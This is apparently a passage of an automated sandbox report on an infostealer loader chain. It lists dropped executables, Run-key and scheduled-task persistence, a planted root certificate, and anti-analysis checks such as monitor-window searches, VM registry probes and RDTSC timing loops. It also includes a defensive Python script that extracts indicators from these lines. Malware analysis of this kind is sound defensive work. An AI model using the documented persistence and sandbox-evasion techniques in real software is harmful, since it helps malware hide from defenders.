Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\Nework[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\penis[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\cccc2[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000357001\Microsoft-Edge.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Jump to dropped file
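The lines in this section follow a fixed pattern ("Source: <process> File created: <path>" and "Source: <process> Registry value created: <key> <value>"), so the drop chain and the persistence indicators can be pulled out mechanically: which process wrote which file, the Run values written under HKCU\...\CurrentVersion\Run (listed under Boot Survival below), the SHA-1 thumbprint of the root certificate RegAsm.exe installed under SystemCertificates\ROOT, and the legacy .job file in C:\Windows\Tasks. The following Python helper is an added example, not part of this report or of any tool named in it; the sample input embedded in it is a constructed excerpt of this report's own lines, and the four categories it sorts indicators into are the example's own choice.

```python
import re
from collections import defaultdict

# Constructed excerpt: a few lines copied from this report, in the report's own format.
SAMPLE_REPORT = r"""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob Jump to behavior
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c6f71c9f40.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ylrdnrwcx
"""

# The "Jump to ..." suffix is the report's hyperlink text and is present on most but not all lines.
TRAILER = r"(?: Jump to (?:behavior|dropped file))?\s*$"
FILE_RE = re.compile(r"^Source: (?P<src>\S+) File created: (?P<path>.+?)" + TRAILER)
REG_RE = re.compile(r"^Source: (?P<src>\S+) Registry value created(?: or modified)?: "
                    r"(?P<key>\S+) (?P<value>.+?)" + TRAILER)


def extract_iocs(report: str) -> dict:
    """Sort the report lines into dropped files, scheduler jobs, Run values and new root certs."""
    iocs = {"dropped": [], "jobs": [], "autostart": [], "root_certs": []}
    for line in report.splitlines():
        m = FILE_RE.match(line)
        if m:
            path = m["path"]
            if path.lower().startswith("c:\\windows\\tasks\\") and path.lower().endswith(".job"):
                iocs["jobs"].append(path)                  # legacy Task Scheduler .job file
            else:
                iocs["dropped"].append(path)
            continue
        m = REG_RE.match(line)
        if m:
            key = m["key"]
            if key.upper().endswith("\\CURRENTVERSION\\RUN"):
                iocs["autostart"].append((m["src"], key, m["value"]))   # value name = Run entry
            elif "\\SYSTEMCERTIFICATES\\ROOT\\CERTIFICATES\\" in key.upper():
                iocs["root_certs"].append(key.rsplit("\\", 1)[1])      # subkey = SHA-1 thumbprint
    for kind in iocs:                                                  # de-duplicate, keep report order
        iocs[kind] = list(dict.fromkeys(iocs[kind]))
    return iocs


def drop_tree(report: str) -> dict:
    """Map each writing process to the files it created, i.e. the loader's drop chain."""
    tree = defaultdict(list)
    for line in report.splitlines():
        m = FILE_RE.match(line)
        if m and m["path"] not in tree[m["src"]]:
            tree[m["src"]].append(m["path"])
    return dict(tree)


if __name__ == "__main__":
    found = extract_iocs(SAMPLE_REPORT)
    for kind, items in found.items():
        print(kind, *items, sep="\n  ")
    for parent, children in drop_tree(SAMPLE_REPORT).items():
        print(parent, "->", ", ".join(children))
```

The root-certificate thumbprint is the indicator to check first on a suspected host: a Run value or a .job file is easy to spot, but a rogue root in the machine store outlives the stealer and silently trusts whatever that key signs. The same regular expressions can be pointed at the full report text to recover the complete drop chain from file.exe down to the ProgramData DLLs.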

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c6f71c9f40.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3ab68b6f1f.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ylrdnrwcx
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: penis.exe, 00000019.00000002.2964689421.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \QEMU-GA.EXE`,
Source: penis.exe, 00000019.00000002.2964689421.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \QEMU-GA.EXE
Source: penis.exe, 00000019.00000002.2964689421.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \QEMU-GA.EXE@\
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEA6B second address: BBEA71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEA71 second address: BBEA9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jnp 00007F99D0DE6F26h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D30877 second address: D30885 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F99D0D12E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D30885 second address: D30889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D30889 second address: D30897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F99D0D12E16h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D49FF9 second address: D49FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4A459 second address: D4A468 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jo 00007F99D0D12E16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4A728 second address: D4A762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0DE6F35h 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b jmp 00007F99D0DE6F2Fh 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 pushad 0x00000014 jmp 00007F99D0DE6F2Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4A762 second address: D4A772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F99D0D12E18h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4D0C1 second address: D4D0C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
